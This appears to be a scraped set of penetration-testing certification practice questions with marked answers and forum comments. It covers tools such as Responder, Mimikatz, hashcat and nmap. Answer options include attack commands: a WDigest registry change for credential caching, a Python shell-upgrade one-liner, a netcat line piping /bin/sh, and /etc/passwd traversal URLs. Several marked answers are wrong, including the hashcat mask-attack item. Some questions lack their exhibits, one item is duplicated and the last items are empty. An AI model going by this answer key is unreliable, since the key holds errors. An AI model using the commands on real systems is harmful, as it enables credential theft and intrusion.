A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

A. Use path modification to escape the application’s framework.

B. Create a frame that overlays the application.

C. Inject a malicious iframe containing JavaScript.

D. Pass an iframe attribute that is malicious.

A

B. Create a frame that overlays the application

100%

85
Q

A security analyst was provided with a detailed penetration report, which was performed against the organization’s DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability?

A. Very difficult; perimeter systems are usually behind a firewall.

B. Somewhat difficult; would require significant processing power to exploit.

C. Trivial; little effort is required to exploit this finding.

D. Impossible; external hosts are hardened to protect against attacks.

A

C. Trivial; little effort is required to exploit this finding.

100%

86
Q

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A. arpspoof

B. nmap

C. responder

D. burpsuite

A

C. responder

100%

87
Q

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

B. nslookup -ns 8.8.8.8 << dnslist.txt

C. for x in {1…254}; do dig -x 192.168.$x.$x; done

D. dig -r > echo “8.8.8.8” >> /etc/resolv.conf

A

A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

100%

88
Q

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the
BEST control to remediate the use of common dictionary terms?

A. Expand the password length from seven to 14 characters.

B. Implement password history restrictions.

C. Configure password filters/

D. Disable the accounts after five incorrect attempts.

E. Decrease the password expiration window.

A

A. Expand the password length from seven to 14 characters.

89
Q

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

A. Common libraries

B. Configuration files

C. Sandbox escape

D. ASLR bypass

A

A. Common libraries

100%

90
Q

Which of the following are MOST important when planning for an engagement? (Select TWO).

A. Goals/objectives

B. Architectural diagrams

C. Tolerance to impact

D. Storage time for a report

E. Company policies

A

A. Goals/objectives

C. Tolerance to impact

100%

91
Q

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

Which of the following is the tester intending to do?

A. Horizontally escalate privileges.

B. Scrape the page for hidden fields.

C. Analyze HTTP response code.

D. Search for HTTP headers.

A

B. Scrape the page for hidden fields.

100%

92
Q

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A. Sample SOAP messages

B. The REST API documentation

C. A protocol fuzzing utility

D. An applicable XSD file

A

D. An applicable XSD file

100%

93
Q

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

B. Identify the issues that can be remediated most quickly and address them first.

C. Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

A

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time

100%

94
Q

Which of the following tools is used to perform a credential brute force attack?

A. Hydra

B. John the Ripper

C. Hashcat

D. Peach

A

A. Hydra

100%

95
Q

DRAG DROP -
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
#!/usr/bin/python
s = “Administrator”
The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.
Select and Place:

Show Suggested Answer

A

100%

96
Q

A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

A. Ensure the scanner can make outbound DNS requests.

B. Ensure the scanner is configured to perform ARP resolution.

C. Ensure the scanner is configured to analyze IP hosts.

D. Ensure the scanner has the proper plug -ins loaded.

A

A. Ensure the scanner can make outbound DNS requests.

97
Q

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

A. LSASS

B. SAM database

C. Active Directory

D. Registry

A

A. LSASS

100%

98
Q

A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)

A. Identity and eliminate inline SQL statements from the code.

B. Identify and eliminate dynamic SQL from stored procedures.

C. Identify and sanitize all user inputs.

D. Use a whitelist approach for SQL statements.

E. Use a blacklist approach for SQL statements.

F. Identify the source of malicious input and block the IP address.

A

C. Identify and sanitize all user inputs

D. Use a whitelist approach for SQL statements

100%

99
Q

During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?

A. Ettercap

B. Tcpdump

C. Responder

D. Medusa

A

C. Responder

100%

100
Q

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd
Which of the following attack types is MOST likely to be the vulnerability?

A. Directory traversal

B. Cross-site scripting

C. Remote file inclusion

D. User enumeration

A

A. Directory traversal

100%

101
Q

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

A. SNMP brute forcing

B. ARP spoofing

C. DNS cache poisoning

D. SMTP relay

A

A. SNMP brute forcing

100%

102
Q

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select
TWO).

A. Convert to JAR.

B. Decompile.

C. Cross-compile the application.

D. Convert JAR files to DEX.

E. Re-sign the APK.

F. Attach to ADB.

A

A. Convert to JAR.

B. Decompile.

100%

103
Q

DRAG DROP -
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented. Each password may be used only once.
Select and Place:

A
104
Q

A consultant wants to scan all the TCP ports on an identified device. Which of the following Nmap switches will complete this task?

A. -p-

B. -p ALL

C. -p 1-65534

D. -port 1-65534

A

A. -p-

100%

105
Q

A penetration tester runs the following from a compromised “˜python -c “˜ import pty;pty.spawn (“/bin/bash”) ‘. Which of the following actions are the tester taking?

A. Removing the Bash history

B. Upgrading the shell

C. Creating a sandbox

D. Capturing credentials

A

B. Upgrading the shell

100%

106
Q

A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?

A. RID cycling to enumerate users and groups

B. Pass the hash to relay credentials

C. Password brute forcing to log into the host

D. Session hijacking to impersonate a system account

A

A. RID cycling to enumerate users and groups

100%

107
Q

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0

B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

A

D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

100%

108
Q

When performing compliance-based assessments, which of the following is the MOST important key consideration?

A. Additional rate

B. Company policy

C. Impact tolerance

D. Industry type

A

D. Industry type

100%

109
Q

During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful.
Which of the following would be the BEST target for continued exploitation efforts?

A. Operating system: Windows 7 Open ports: 23, 161

B. Operating system: Windows Server 2016 Open ports: 53, 5900

C. Operating system: Windows 8.1 Open ports: 445, 3389

D. Operating system: Windows 8 Open ports: 514, 3389

A

C. Operating system: Windows 8.1 Open ports: 445, 3389

100%

110
Q

The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?

A. Kernel vulnerabilities

B. Sticky bits

C. Unquoted service path

D. Misconfigured sudo

A

Don’t know the answer yet

111
Q

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

A. Arbitrary code execution

B. Session hijacking

C. SQL injection

D. Login credential brute-forcing

E. Cross-site request forgery

A

A. Arbitrary code execution

B. Session hijacking

Not 100%

mr_robot

4 months, 1 week ago

I would go for A and B. Cross-Site Tracing (XST) https://owasp.org/www-community/attacks/Cross_Site_Tracing https://capec.mitre.org/data/definitions/107.html Arbitrary code execution https://www.kb.cert.org/vuls/id/520827/

upvoted 3 times

mr_robot

3 months, 4 weeks ago

Maybe A and D? Arbitrary code execution https://www.kb.cert.org/vuls/id/520827/ Login credential brute-forcing https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d

upvoted 3 times

D1960

3 months, 2 weeks ago

Lines 6 and 15 suggest answers are: A. Arbitrary code execution D. Login credential brute-forcing The reason for D is line 6 XST or Cross-site tracing Except there is no XST answer However, XST can be used to steal credentials. Therefore, I guess the answers are: AD —- line 6: + OSVM-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST —- line 15: + /dvwa/7-s: PHP allows retrieval of the sorce code via -s parameter, and may allow command execution. u See http://www.kb.cert.org/vuls/id/520827 Reference: https://en.wikipedia.org/wiki/Cross-site_tracing

upvoted 1 times

D1960

3 months, 2 weeks ago

Then again, maybe AB? According to wikipedia, XST can be used to get cookies. Cookies can be used for session hijacking. “XST scripts exploit ActiveX, Flash, or any other controls that allow executing an HTTP TRACE request. The HTTP TRACE response includes all the HTTP headers including authentication data and HTTP cookie contents, which are then available to the script. In combination with cross domain access flaws in web browsers, the exploit is able to collect the cached credentials of any web site, including those utilizing SSL. “ https://en.wikipedia.org/wiki/Cross-site_tracing

upvoted 2 times

mr_robot

3 months ago

Agree with AB. https://owasp.org/www-community/attacks/Cross_Site_Tracing https://searchsoftwarequality.techtarget.com/definition/cross-site-tracing https://deadliestwebattacks.com/2010/05/18/cross-site-tracing-xst-the-misunderstood-vulnerability/

112
Q

A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the
BEST step for penetration?

A. Obtain staff information by calling the company and using social engineering techniques.

B. Visit the client and use impersonation to obtain information from staff.

C. Send spoofed emails to staff to see if staff will respond with sensitive information.

D. Search the internet for information on staff such as social networking sites.

A

D. Search the internet for information on staff such as social networking sites.

100%

113
Q

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

A. Cleartext exposure of SNMP trap data

B. Software bugs resident in the IT ticketing system

C. S/MIME certificate templates defined by the CA

D. Health information communicated over HTTP

E. DAR encryption on records servers

A

D. Health information communicated over HTTP

E. DAR encryption on records servers

100%

114
Q

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A. Transition the application to another port.

B. Filter port 443 to specific IP addresses.

C. Implement a web application firewall.

D. Disable unneeded services.

A

D. Disable unneeded services.

100%

115
Q

A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

A. TCP SYN flood

B. SQL injection

C. XSS

D. XMAS scan

A

A. TCP SYN flood

100%

116
Q

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

A. Wait outside of the company’s building and attempt to tailgate behind an employee.

B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.

C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

D. Search social media for information technology employees who post information about the technologies they work with.

E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

A

C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

D. Search social media for information technology employees who post information about the technologies they work with.

100%

117
Q

A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?

A. nmap -Pn -sT 100.100.1.0-125

B. nmap -sF -p 100.100.1.0-125

C. nmap -sV -oA output 100.100.10-125

D. nmap 100.100.1.0-125 -T4

A

I don’t know yet

118
Q

Given the following:
http://example.com/download.php?id-…/…/…/etc/passwd
Which of the following BEST describes the above attack?

A. Malicious file upload attack

B. Redirect attack

C. Directory traversal attack

D. Insecure direct object reference attack

A

C. Directory traversal attack

100%

119
Q

A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1}; do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?

A. Port scan

B. Service enumeration

C. Live host identification

D. Denial of service

A

C. Live host identification

100%

120
Q

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5.
Which of the following commands will test if the VPN is available?

A. fpipe.exe -1 8080 -r 80 100.170.60.5

B. ike-scan -A -t 1 –sourceip=apoof_ip 100.170.60.5

C. nmap -sS -A -f 100.170.60.5

D. nc 100.170.60.5 8080 /bin/sh

A

B. ike-scan -A -t 1 –sourceip=apoof_ip 100.170.60.5

100%

121
Q

A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?

A. hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

B. hashcat -m 5600 hash.txt

C. hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

D. hashcat -m 5600 -o results.text hash.txt wordlist.txt

A

A. hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

100%

122
Q

Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?

A. Penetration test findings often contain company intellectual property

B. Penetration test findings could lead to consumer dissatisfaction if made public.

C. Penetration test findings are legal documents containing privileged information.

D. Penetration test findings can assist an attacker in compromising a system.

A

D. Penetration test findings can assist an attacker in compromising a system.

100%

123
Q

An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network access via DHCP, but is not given any network maps or target IP addresses. Which of the following commands can the assessor use to find any likely Windows domain controllers?

A. dig -q any _kerberos._tcp.internal.comptia.net

B. dig -q any _lanman._tcp.internal.comptia.net

C. dig -q any _ntlm._tcp.internal.comptia.net

D. dig -q any _smtp._tcp.internal.comptia.net

A

A. dig -q any _kerberos._tcp.internal.comptia.net

100%

124
Q

A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

A. Run the application through a dynamic code analyzer.

B. Employ a fuzzing utility.

C. Decompile the application.

D. Check memory allocations.

A

C. Decompile the application

100%

125
Q

A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?

A. nmap -p 22 -iL targets

B. nmap -p 22 -sL targets

C. nmap -p 22 -oG targets

D. nmap -p 22 -oA targets

A

A. nmap -p 22 -iL targets

100%

126
Q

penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

A. The client has applied a hot fix without updating the version.

B. The threat landscape has significantly changed.

C. The client has updated their codebase with new features.

D. Thera are currently no known exploits for this vulnerability.

A

A. The client has applied a hot fix without updating the version.

100%

127
Q

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A. ICS vendors are slow to implement adequate security controls.

B. ICS staff are not adequately trained to perform basic duties.

C. There is a scarcity of replacement equipment for critical devices.

D. There is a lack of compliance for ICS facilities.

A

B. ICS staff are not adequately trained to perform basic duties.

100%

128
Q

For which of the following reasons does a penetration tester need to have a customer’s point-of-contact information available at all times? (Choose three.)

A. To report indicators of compromise

B. To report findings that cannot be exploited

C. To report critical findings

D. To report the latest published exploits

E. To update payment information

F. To report a server that becomes unresponsive

G. To update the statement of work

H. To report a cracked password

A

A. To report indicators of compromise

C. To report critical findings

F. To report a server that becomes unresponsive

100%

129
Q

After performing a security assessment for a firm, the client was found to have been billed for the time the client’s test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?

A. SOW

B. NDA

C. EULA

D. BPA

A

A. SOW

100%

130
Q

Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)

A. The tester discovers personally identifiable data on the system.

B. The system shows evidence of prior unauthorized compromise.

C. The system shows a lack of hardening throughout.

D. The system becomes unavailable following an attempted exploit.

E. The tester discovers a finding on an out-of-scope system.

A

B. The system shows evidence of prior unauthorized compromise.

D. The system becomes unavailable following an attempted exploit.

100%

131
Q

A. Credential dump attack

B. DLL injection attack

C. Reverse shell attack

D. Pass the hash attack

A

D. Pass the hash attack

100%

132
Q

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?

A. Forced browsing vulnerability

B. Parameter pollution vulnerability

C. File upload vulnerability

D. Cookie enumeration

A

A. Forced browsing vulnerability

100%

133
Q

Given the following Python script:

Which of the following is where the output will go?

A. To the screen

B. To a network server

C. To a file

D. To /dev/null

A

A. To the screen

100%

134
Q

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

Which of the following is the tester intending to do?

A. Horizontally escalate privileges.

B. Scrape the page for hidden fields.

C. Analyze HTTP response code.

D. Search for HTTP headers.

A

B. Scrape the page for hidden fields.

100%

135
Q
A
136
Q
A
137
Q
A